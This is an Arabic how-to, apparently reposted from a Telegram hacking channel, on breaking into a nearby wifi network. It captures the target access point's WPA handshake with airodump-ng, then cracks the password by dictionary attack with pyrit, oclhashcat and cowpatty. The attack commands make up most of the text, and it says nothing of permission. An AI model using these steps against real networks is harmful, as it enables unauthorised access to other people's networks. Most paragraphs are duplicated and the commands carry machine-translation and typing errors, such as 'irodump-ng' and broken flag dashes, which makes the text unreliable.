بعد تشغيل الأمر أعلاه ، سيبدأ الاستماع لكل حركة مرور wifi القريبة ، لذا انتظر حتى يظهر هدفك ، ثم اضغط على ctrl ^ c.
الآن علينا أن نستمع إلى قناة محددة يوجد عليها الهدف. الآن قم بتشغيل الأمر:
irodump-ng -c 2 –bssid 3C:1E:04:XX:XX:XX –write sommay wlan0mon
-c == رقم قناة الهدف (2 في حالتي ، راجع العمود CH)
–bssid == عنوان MAC للهدف AP
- write == اسم ملف الالتقاط
الآن علينا أن نستمع إلى قناة محددة يوجد عليها الهدف. الآن قم بتشغيل الأمر:
irodump-ng -c 2 –bssid 3C:1E:04:XX:XX:XX –write sommay wlan0mon
-c == رقم قناة الهدف (2 في حالتي ، راجع العمود CH)
–bssid == عنوان MAC للهدف AP
- write == اسم ملف الالتقاط
انتظر الآن حتى يتم التقاط مصافحة WPA ثم اضغط على crtl ^ c.
سيتم الآن إنشاء ملف باسم sommay-01.cap
سيتم الآن إنشاء ملف باسم sommay-01.cap
PYRIT
الطريقة الأولى للقضاء على كلمة المرور من ملف الالتقاط هي PYRIT. سوف نستخدم القاموس الهجوم حتى تشغيل الأمر:
pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough
-i ==
المسار إلى ملف الإدخال في حالتنا هو المسار إلى القاموس
-r ==
المسار إلى الأسطول الذي تم (في حالتنا يكون sommay-01.cap)
attack_passthrough ==
هذه الخيارات هي تحديد أن هجوم القاموس يجب تنفيذه
كما ترون فقد نجحت في كسر كلمة المرور.
الطريقة الأولى للقضاء على كلمة المرور من ملف الالتقاط هي PYRIT. سوف نستخدم القاموس الهجوم حتى تشغيل الأمر:
pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough
-i ==
المسار إلى ملف الإدخال في حالتنا هو المسار إلى القاموس
-r ==
المسار إلى الأسطول الذي تم (في حالتنا يكون sommay-01.cap)
attack_passthrough ==
هذه الخيارات هي تحديد أن هجوم القاموس يجب تنفيذه
كما ترون فقد نجحت في كسر كلمة المرور.
OCLHASHCAT
بادئ ذي بدء ، قم بتنزيل oclhashcat
من موقعه الرسمي: https://hashcat.net/files/hashcat-2.00.7z
أولاً يتعين علينا تحويل ملف .cap الذي تم التقاطه باستخدام airodump-ng مسبقًا إلى .hccap with aircrack-ng حسب الأمر:
aircrack-ng sommay-01.cap -J sommay-01
-J ==
المسار إلى ملف الإخراج مع التمديد .hccap
بادئ ذي بدء ، قم بتنزيل oclhashcat
من موقعه الرسمي: https://hashcat.net/files/hashcat-2.00.7z
أولاً يتعين علينا تحويل ملف .cap الذي تم التقاطه باستخدام airodump-ng مسبقًا إلى .hccap with aircrack-ng حسب الأمر:
aircrack-ng sommay-01.cap -J sommay-01
-J ==
المسار إلى ملف الإخراج مع التمديد .hccap
الآن قم بنسخ القاموس الذي تريد استخدامه في مجلد Hashcat. أدخل الآن في المجلد hashcat وتشغيل الأمر:
./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst
في الأمر أعلاه ، إذا كنت تستخدم نظام 32 بت ، فاستبدل 64 بـ 32.
-m هو نوع التجزئة وهو 2500 لتكسير WPA / WPA2
ثم قم بإعطاء المسار إلى ملف hccap الذي قمت بتحويله باستخدام aircrack-ng. ثم اسم ملف القاموس. كما ترون فقد نجحت في كسر كلمة المرور.
./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst
في الأمر أعلاه ، إذا كنت تستخدم نظام 32 بت ، فاستبدل 64 بـ 32.
-m هو نوع التجزئة وهو 2500 لتكسير WPA / WPA2
ثم قم بإعطاء المسار إلى ملف hccap الذي قمت بتحويله باستخدام aircrack-ng. ثم اسم ملف القاموس. كما ترون فقد نجحت في كسر كلمة المرور.
COWPATTY
للتشققات بمساعدة cowpatty ، علينا أولاً إنشاء ملف التجزئة الخاص بـ AP المستهدف. لهذا سوف نستخدم genpmk لذلك قم بتشغيل الأمر:
genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY
-f ==
المسار إلى ملف القاموس
-d ==
اسم قاموس الإخراج
-s ==
ESSID (اسم) الهدف AP (يجب أن يكون الاسم مطابقًا للهدف AP)
الآن سيتم إنشاء ملف قاموس باسم cowpatty_dict مما سيسرع في عملية التكسير.
للتشققات بمساعدة cowpatty ، علينا أولاً إنشاء ملف التجزئة الخاص بـ AP المستهدف. لهذا سوف نستخدم genpmk لذلك قم بتشغيل الأمر:
genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY
-f ==
المسار إلى ملف القاموس
-d ==
اسم قاموس الإخراج
-s ==
ESSID (اسم) الهدف AP (يجب أن يكون الاسم مطابقًا للهدف AP)
الآن سيتم إنشاء ملف قاموس باسم cowpatty_dict مما سيسرع في عملية التكسير.
الآن قم بتشغيل الأمر:
cowpatty -d cowpatty_dict -r sommay-01.cap -s SOMMAY
-d ==
المسار إلى القاموس أنشأناه مع genpmk
-r ==
المسار إلى ملف الالتقاط الذي أنشأناه باستخدام airodump-ng
-s ==
ESSID للهدف AP (يجب أن يكون الاسم مطابقًا للهدف AP)
cowpatty -d cowpatty_dict -r sommay-01.cap -s SOMMAY
-d ==
المسار إلى القاموس أنشأناه مع genpmk
-r ==
المسار إلى ملف الالتقاط الذي أنشأناه باستخدام airodump-ng
-s ==
ESSID للهدف AP (يجب أن يكون الاسم مطابقًا للهدف AP)
Forwarded from عالم الهكر العربي (Database_HK)